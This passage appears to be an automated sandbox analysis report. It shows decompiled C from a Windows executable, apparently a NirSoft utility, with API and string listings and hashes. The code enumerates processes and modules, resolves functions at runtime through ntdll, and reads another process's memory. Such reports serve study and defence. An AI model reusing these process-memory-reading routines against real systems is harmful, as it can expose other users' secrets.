                                                                                      							 *0x40f838 = _t2;
                                                                                      							if(_t2 != 0) {
                                                                                      								_t2 = GetProcAddress(_t5, "EnumProcesses");
                                                                                      								 *0x40fa6c = _t2;
                                                                                      								if(_t2 != 0) {
                                                                                      									_t2 = GetProcAddress(_t5, "GetModuleInformation");
                                                                                      									 *0x40f844 = _t2;
                                                                                      									if(_t2 != 0) {
                                                                                      										 *0x4101bc = 1;
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					if( *0x4101bc == 0) {
                                                                                      						_t2 = FreeLibrary(_t5);
                                                                                      					}
                                                                                      					goto L10;
                                                                                      				}
                                                                                      			}







                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                      • API String ID: 1182944575-70141382
                                                                                      • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                      • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                      • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                      • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004090EE() {
                                                                                      				void* _t1;
                                                                                      				_Unknown_base(*)()* _t2;
                                                                                      				struct HINSTANCE__* _t4;
                                                                                      
                                                                                      				if( *0x4101b8 != 0) {
                                                                                      					return _t1;
                                                                                      				}
                                                                                      				_t2 = GetModuleHandleW(L"kernel32.dll");
                                                                                      				_t4 = _t2;
                                                                                      				if(_t4 == 0) {
                                                                                      					L9:
                                                                                      					return _t2;
                                                                                      				}
                                                                                      				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                                      				 *0x40f83c = _t2;
                                                                                      				if(_t2 != 0) {
                                                                                      					_t2 = GetProcAddress(_t4, "Module32First");
                                                                                      					 *0x40f834 = _t2;
                                                                                      					if(_t2 != 0) {
                                                                                      						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                                      						 *0x40f830 = _t2;
                                                                                      						if(_t2 != 0) {
                                                                                      							_t2 = GetProcAddress(_t4, "Process32First");
                                                                                      							 *0x40f5c4 = _t2;
                                                                                      							if(_t2 != 0) {
                                                                                      								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                                      								 *0x40f828 = _t2;
                                                                                      								if(_t2 != 0) {
                                                                                      									 *0x4101b8 = 1;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				goto L9;
                                                                                      			}







                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                      • API String ID: 667068680-3953557276
                                                                                      • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                      • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                      • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                      • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 56%
                                                                                      			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                                      				void _v514;
                                                                                      				char _v516;
                                                                                      				void _v1026;
                                                                                      				char _v1028;
                                                                                      				void _v1538;
                                                                                      				char _v1540;
                                                                                      				void* _t39;
                                                                                      				intOrPtr* _t50;
                                                                                      				void* _t61;
                                                                                      
                                                                                      				_t50 = __ecx;
                                                                                      				_push(0x1fe);
                                                                                      				_push(0);
                                                                                      				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                      					_v1540 = 0;
                                                                                      					memset( &_v1538, ??, ??);
                                                                                      					_v1028 = 0;
                                                                                      					memset( &_v1026, 0, 0x1fe);
                                                                                      					_v516 = 0;
                                                                                      					memset( &_v514, 0, 0x1fe);
                                                                                      					L0040B1EC();
                                                                                      					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                                      					L0040B1EC();
                                                                                      					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                                      					if (_t39 != 0) goto L3;
                                                                                      					return _t39;
                                                                                      				}
                                                                                      				_v516 = 0;
                                                                                      				memset( &_v514, ??, ??);
                                                                                      				_v1028 = 0;
                                                                                      				memset( &_v1026, 0, 0x1fe);
                                                                                      				L0040B1EC();
                                                                                      				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                                      				L0040B1EC();
                                                                                      				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                                      			}













                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf
                                                                                      • String ID: %%0.%df
                                                                                      • API String ID: 3473751417-763548558
                                                                                      • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                      • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                      • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                      • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 51%
                                                                                      			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                                      				void _v8202;
                                                                                      				short _v8204;
                                                                                      				void* _t27;
                                                                                      				short _t29;
                                                                                      				short _t40;
                                                                                      				void* _t41;
                                                                                      				struct HMENU__* _t43;
                                                                                      				short _t50;
                                                                                      				void* _t52;
                                                                                      				struct HMENU__* _t59;
                                                                                      
                                                                                      				E0040B550(0x2008, __ecx);
                                                                                      				_t65 = _a8 - 4;
                                                                                      				if(_a8 != 4) {
                                                                                      					__eflags = _a8 - 5;
                                                                                      					if(_a8 == 5) {
                                                                                      						_t50 =  *0x40fe2c; // 0x0
                                                                                      						__eflags = _t50;
                                                                                      						if(_t50 == 0) {
                                                                                      							L8:
                                                                                      							_push(_a12);
                                                                                      							_t27 = 5;
                                                                                      							E00405E8D(_t27);
                                                                                      							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
                                                                                      							__eflags = _t29;
                                                                                      							_a8 = _t29;
                                                                                      							if(_t29 == 0) {
                                                                                      								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
                                                                                      							}
                                                                                      							_v8204 = 0;
                                                                                      							memset( &_v8202, 0, 0x2000);
                                                                                      							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                                      							__eflags = _v8204;
                                                                                      							if(__eflags != 0) {
                                                                                      								E00405FAC(__eflags, L"caption",  &_v8204, 0);
                                                                                      							}
                                                                                      							EnumChildWindows(_a8, E0040614F, 0);
                                                                                      							DestroyWindow(_a8);
                                                                                      						} else {
                                                                                      							while(1) {
                                                                                      								_t40 =  *_t50;
                                                                                      								__eflags = _t40;
                                                                                      								if(_t40 == 0) {
                                                                                      									goto L8;
                                                                                      								}
                                                                                      								__eflags = _t40 - _a12;
                                                                                      								if(_t40 != _a12) {
                                                                                      									_t50 = _t50 + 4;
                                                                                      									__eflags = _t50;
                                                                                      									continue;
                                                                                      								}
                                                                                      								goto L13;
                                                                                      							}
                                                                                      							goto L8;
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					_push(_a12);
                                                                                      					_t41 = 4;
                                                                                      					E00405E8D(_t41);
                                                                                      					_pop(_t52);
                                                                                      					_t43 = LoadMenuW(_a4, _a12);
                                                                                      					 *0x40fe20 =  *0x40fe20 & 0x00000000;
                                                                                      					_t59 = _t43;
                                                                                      					_push(1);
                                                                                      					_push(_t59);
                                                                                      					_push(_a12);
                                                                                      					E0040605E(_t52, _t65);
                                                                                      					DestroyMenu(_t59);
                                                                                      				}
                                                                                      				L13:
                                                                                      				return 1;
                                                                                      			}

                                                                                      APIs
                                                                                      • LoadMenuW.USER32 ref: 00406236
                                                                                        • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                        • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                        • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                        • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                      • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                      • CreateDialogParamW.USER32 ref: 004062A9
                                                                                      • GetDesktopWindow.USER32 ref: 004062B4
                                                                                      • CreateDialogParamW.USER32 ref: 004062C1
                                                                                      • memset.MSVCRT ref: 004062DA
                                                                                      • GetWindowTextW.USER32 ref: 004062F1
                                                                                      • EnumChildWindows.USER32 ref: 0040631E
                                                                                      • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                        • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                      • String ID: caption
                                                                                      • API String ID: 973020956-4135340389
                                                                                      • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                      • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                      • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                      • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 65%
                                                                                      			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                      				void _v2050;
                                                                                      				char _v2052;
                                                                                      				void _v4098;
                                                                                      				long _v4100;
                                                                                      				void _v6146;
                                                                                      				char _v6148;
                                                                                      				void* __esi;
                                                                                      				void* _t43;
                                                                                      				intOrPtr* _t49;
                                                                                      				intOrPtr* _t57;
                                                                                      				void* _t58;
                                                                                      				void* _t59;
                                                                                      				intOrPtr _t62;
                                                                                      				intOrPtr _t63;
                                                                                      
                                                                                      				_t49 = __ecx;
                                                                                      				E0040B550(0x1800, __ecx);
                                                                                      				_t57 = _t49;
                                                                                      				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                      				_v4100 = 0;
                                                                                      				memset( &_v4098, 0, 0x7fe);
                                                                                      				_v2052 = 0;
                                                                                      				memset( &_v2050, 0, 0x7fe);
                                                                                      				_v6148 = 0;
                                                                                      				memset( &_v6146, 0, 0x7fe);
                                                                                      				_t59 = _t58 + 0x24;
                                                                                      				_t62 =  *0x40fe30; // 0x0
                                                                                      				if(_t62 != 0) {
                                                                                      					_push(0x40fe30);
                                                                                      					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                                      					_push(0x400);
                                                                                      					_push( &_v2052);
                                                                                      					L0040B1EC();
                                                                                      					_t59 = _t59 + 0x10;
                                                                                      				}
                                                                                      				_t63 =  *0x40fe28; // 0x0
                                                                                      				if(_t63 != 0) {
                                                                                      					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
                                                                                      				}
                                                                                      				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
                                                                                      				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
                                                                                      				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                      				_push(0x400);
                                                                                      				_push( &_v6148);
                                                                                      				L0040B1EC();
                                                                                      				_t43 = E00407343(_t57, _a4,  &_v6148);
                                                                                      				_t64 = _a8 - 5;
                                                                                      				if(_a8 == 5) {
                                                                                      					return E00407D03(_t57, _t64, _a4);
                                                                                      				}
                                                                                      				return _t43;
                                                                                      			}

                                                                                      APIs
                                                                                      Strings
                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                      • API String ID: 1283228442-2366825230
                                                                                      • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                      • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                      • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                      • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 85%
                                                                                      			E0040920A(wchar_t* __edi, wchar_t* __esi) {
                                                                                      				void _v526;
                                                                                      				long _v528;
                                                                                      				wchar_t* _t17;
                                                                                      				signed int _t40;
                                                                                      				wchar_t* _t50;
                                                                                      
                                                                                      				_t50 = __edi;
                                                                                      				if(__esi[0] != 0x3a) {
                                                                                      					_t17 = wcschr( &(__esi[1]), 0x3a);
                                                                                      					if(_t17 == 0) {
                                                                                      						_t40 = E0040488D(__esi, L"\\systemroot");
                                                                                      						if(_t40 < 0) {
                                                                                      							if( *__esi != 0x5c) {
                                                                                      								wcscpy(__edi, __esi);
                                                                                      							} else {
                                                                                      								_v528 = 0;
                                                                                      								memset( &_v526, 0, 0x208);
                                                                                      								E00404C08( &_v528);
                                                                                      								memcpy(__edi,  &_v528, 4);
                                                                                      								__edi[1] = __edi[1] & 0x00000000;
                                                                                      								wcscat(__edi, __esi);
                                                                                      							}
                                                                                      						} else {
                                                                                      							_v528 = 0;
                                                                                      							memset( &_v526, 0, 0x208);
                                                                                      							E00404C08( &_v528);
                                                                                      							wcscpy(__edi,  &_v528);
                                                                                      							wcscat(__edi, __esi + 0x16 + _t40 * 2);
                                                                                      						}
                                                                                      						L11:
                                                                                      						return _t50;
                                                                                      					}
                                                                                      					_push( &(_t17[0]));
                                                                                      					L4:
                                                                                      					wcscpy(_t50, ??);
                                                                                      					goto L11;
                                                                                      				}
                                                                                      				_push(__esi);
                                                                                      				goto L4;
                                                                                      			}









                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 00409223
                                                                                      • wcscpy.MSVCRT ref: 00409233
                                                                                        • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                        • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                        • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                      • wcscpy.MSVCRT ref: 00409282
                                                                                      • wcscat.MSVCRT ref: 0040928D
                                                                                      • memset.MSVCRT ref: 00409269
                                                                                        • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                        • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                      • memset.MSVCRT ref: 004092B1
                                                                                      • memcpy.MSVCRT ref: 004092CC
                                                                                      • wcscat.MSVCRT ref: 004092D8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                      • String ID: \systemroot
                                                                                      • API String ID: 4173585201-1821301763
                                                                                      • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                      • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                      • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                      • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 48%
                                                                                      			E00409C70(signed int* _a4) {
                                                                                      				signed int _v8;
                                                                                      				_Unknown_base(*)()* _v12;
                                                                                      				char* _v16;
                                                                                      				int _v18;
                                                                                      				signed int _v20;
                                                                                      				char _v36;
                                                                                      				intOrPtr* _t21;
                                                                                      				struct HINSTANCE__* _t22;
                                                                                      				signed int _t23;
                                                                                      				signed int _t24;
                                                                                      				_Unknown_base(*)()* _t26;
                                                                                      				char* _t28;
                                                                                      				int _t31;
                                                                                      
                                                                                      				_t21 = _a4;
                                                                                      				if( *_t21 == 0) {
                                                                                      					_t22 = GetModuleHandleW(L"kernel32.dll");
                                                                                      					_v8 = _t22;
                                                                                      					_t23 = GetProcAddress(_t22, "GetProcAddress");
                                                                                      					 *_a4 = _t23;
                                                                                      					_t24 = _t23 ^ _v8;
                                                                                      					if((_t24 & 0xfff00000) != 0) {
                                                                                      						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
                                                                                      						_v20 = _v20 & 0x00000000;
                                                                                      						_v12 = _t26;
                                                                                      						asm("stosd");
                                                                                      						asm("stosw");
                                                                                      						asm("movsd");
                                                                                      						asm("movsd");
                                                                                      						asm("movsd");
                                                                                      						asm("movsw");
                                                                                      						_t28 =  &_v36;
                                                                                      						asm("movsb");
                                                                                      						_v16 = _t28;
                                                                                      						_v20 = strlen(_t28);
                                                                                      						_t31 = strlen( &_v36);
                                                                                      						_v18 = _t31;
                                                                                      						_t24 = _v12(_v8,  &_v20, 0, _a4);
                                                                                      					}
                                                                                      					return _t24;
                                                                                      				}
                                                                                      				return _t21;
                                                                                      			}

















                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                      • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                      • strlen.MSVCRT ref: 00409CE4
                                                                                      • strlen.MSVCRT ref: 00409CF1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcstrlen
                                                                                      • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                      • API String ID: 1027343248-2054640941
                                                                                      • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                      • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                      • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                      • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 79%
                                                                                      			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
                                                                                      				long _v8;
                                                                                      				int _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				int _v20;
                                                                                      				int _v24;
                                                                                      				char _v28;
                                                                                      				void _v538;
                                                                                      				char _v540;
                                                                                      				int _v548;
                                                                                      				char _v564;
                                                                                      				char _v22292;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* _t37;
                                                                                      				void* _t48;
                                                                                      				void* _t56;
                                                                                      				signed int _t57;
                                                                                      				void* _t67;
                                                                                      				long _t69;
                                                                                      				void* _t70;
                                                                                      				void* _t72;
                                                                                      				void* _t74;
                                                                                      				void* _t76;
                                                                                      
                                                                                      				_t67 = __edx;
                                                                                      				E0040B550(0x5714, __ecx);
                                                                                      				_t37 = OpenProcess(0x10, 0, _a16);
                                                                                      				_t82 = _t37;
                                                                                      				_a16 = _t37;
                                                                                      				if(_t37 == 0) {
                                                                                      					_t69 = GetLastError();
                                                                                      				} else {
                                                                                      					_t72 =  &_v22292;
                                                                                      					E0040171F(_t72, _t82);
                                                                                      					_v8 = 0;
                                                                                      					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
                                                                                      						_t69 = GetLastError();
                                                                                      					} else {
                                                                                      						_t48 = E00405642( &_v564);
                                                                                      						_t74 = _v548;
                                                                                      						_t70 = _t48;
                                                                                      						_a12 = _t74;
                                                                                      						_v540 = 0;
                                                                                      						memset( &_v538, 0, 0x1fe);
                                                                                      						asm("cdq");
                                                                                      						_push(_t67);
                                                                                      						_push(_t74);
                                                                                      						_push(_t70);
                                                                                      						_push(L"%d  %I64x");
                                                                                      						_push(0xff);
                                                                                      						_push( &_v540);
                                                                                      						L0040B1EC();
                                                                                      						_v548 = 0;
                                                                                      						E004055D1( &_v540,  &_v564);
                                                                                      						_t16 = _t70 + 0xa; // 0xa
                                                                                      						_t68 = _t16;
                                                                                      						_v24 = 0;
                                                                                      						_v12 = 0;
                                                                                      						_v20 = 0;
                                                                                      						_v16 = 0x100;
                                                                                      						_v28 = 0;
                                                                                      						E0040559A( &_v28, _t16);
                                                                                      						_t76 = _v12;
                                                                                      						_t56 = 0x40c4e8;
                                                                                      						if(_t76 != 0) {
                                                                                      							_t56 = _t76;
                                                                                      						}
                                                                                      						_t26 = _t70 + 2; // 0x2
                                                                                      						_t66 = _t70 + _t26;
                                                                                      						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
                                                                                      						_t85 = _t76;
                                                                                      						if(_t76 == 0) {
                                                                                      							_t76 = 0x40c4e8;
                                                                                      						}
                                                                                      						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
                                                                                      						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
                                                                                      						E004055D1(_t61,  &_v28);
                                                                                      					}
                                                                                      					E004055D1(CloseHandle(_a16),  &_v564);
                                                                                      				}
                                                                                      				return _t69;
                                                                                      			}



























                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                      • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                      • memset.MSVCRT ref: 00401B4A
                                                                                      • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                      • _snwprintf.MSVCRT ref: 00401B69
                                                                                        • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                        • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                      • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
